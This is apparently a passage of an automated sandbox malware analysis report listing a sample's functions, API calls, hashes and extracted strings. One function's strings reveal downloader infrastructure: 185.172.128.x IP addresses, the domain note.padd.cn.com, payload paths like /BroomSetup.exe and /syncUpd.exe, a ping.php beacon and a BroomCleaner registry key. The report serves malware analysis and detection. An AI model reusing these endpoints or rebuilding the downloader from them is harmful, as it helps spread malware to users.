                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                        • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                        • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                        • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                        • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                        • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3585332825-0
                                                                                                                                                                                                                                      • Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
                                                                                                                                                                                                                                      • Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                      • Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
                                                                                                                                                                                                                                      • Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: 7e3c3b2e03c3d6e18dbbb536e19013ee5f5a2c75f1da2fa632e63c4bac1336c5
                                                                                                                                                                                                                                      • Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e3c3b2e03c3d6e18dbbb536e19013ee5f5a2c75f1da2fa632e63c4bac1336c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception@8Throw
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2005118841-0
                                                                                                                                                                                                                                      • Opcode ID: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
                                                                                                                                                                                                                                      • Instruction ID: 8f33375d03ef340e879cf663a0733e21cf849d267f07301eb1b68e0c667a0042
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FE0923440430DB6CF007A66E8169AE772C1E04324B20497FB928B56E2EF78DD96C18E
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
                                                                                                                                                                                                                                      • Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 041E58E6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 041E5000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_41e5000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                      • Instruction ID: 7fd5b1669d842760ddf6aee63c808eaec61c66d0a7175d9e7822d7626bb9b16c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA113C79A00208FFDB01DF99CA85E98BBF5AF08751F058094FA489B362D371EA50DF80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04166823: __EH_prolog.LIBCMT ref: 04166828
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 04164D3B
                                                                                                                                                                                                                                        • Part of subcall function 041662B1: __EH_prolog.LIBCMT ref: 041662B6
                                                                                                                                                                                                                                        • Part of subcall function 041662B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 04166398
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                                      • String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
                                                                                                                                                                                                                                      • API String ID: 2531350358-3920416335
                                                                                                                                                                                                                                      • Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
                                                                                                                                                                                                                                      • Instruction ID: 96a96a0061578520eb79de5e64c552fc9406ab7b8c75acb49665a63cd9182ee2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29A2571070B2D57EE751B77C58A63CE2BE09B93244FD474A9C6B85B323CB54A20C87DA
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32 ref: 00420977
                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 004209D2
                                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                      • String ID: ,CUSA
                                                                                                                                                                                                                                      • API String ID: 745075371-2978500865
                                                                                                                                                                                                                                      • Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                                      • Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                      • Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
                                                                                                                                                                                                                                      • Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00420015
                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 004200A5
                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 004200B3
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                      • String ID: ,CUSA
                                                                                                                                                                                                                                      • API String ID: 4212172061-2978500865
                                                                                                                                                                                                                                      • Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                                      • Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
                                                                                                                                                                                                                                      • GetACP.KERNEL32 ref: 0042076E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                      • Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                                      • Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 04160997
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 041609C0
                                                                                                                                                                                                                                      • GetACP.KERNEL32 ref: 041609D5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                      • Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                                      • Instruction ID: 3e6a1382cbfbf8c2e767a909d49958cb46a8ad65afbfe1e86ee67d411d432272
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44219722741105AAF734CF55C991BA77BA7EB48A64B4784A4EA4FD7100E732EE51C390
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FDF
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FEC
                                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32 ref: 04160BDE
                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 04160C39
                                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 04160C48
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 04160C90
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 04160CAF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 745075371-0
                                                                                                                                                                                                                                      • Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                                      • Instruction ID: 84294c56df2ea4a31a09f17cba6e3a7d93780644158b516937c2140b79823c4c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6518575A002159BEB20DFA5DC84ABE7BBCEF08704F0485A9E916E7190E771E910CB65
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: y%B$y%B
                                                                                                                                                                                                                                      • API String ID: 0-2510245575
                                                                                                                                                                                                                                      • Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
                                                                                                                                                                                                                                      • Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE
                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0416027C
                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 0416030C
                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 0416031A
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 041603BD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4212172061-0
                                                                                                                                                                                                                                      • Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                                      • Instruction ID: f093912217bd0cc2c0a1a40a1684d49d67d119bed45ff919d189ca5cf4edb246
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81610772600206ABE725EF74CCC1BAA7BACEF0C304F14446AE95AD7190EB70F951C7A4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2829624132-0
                                                                                                                                                                                                                                      • Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
                                                                                                                                                                                                                                      • Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                      • String ID:
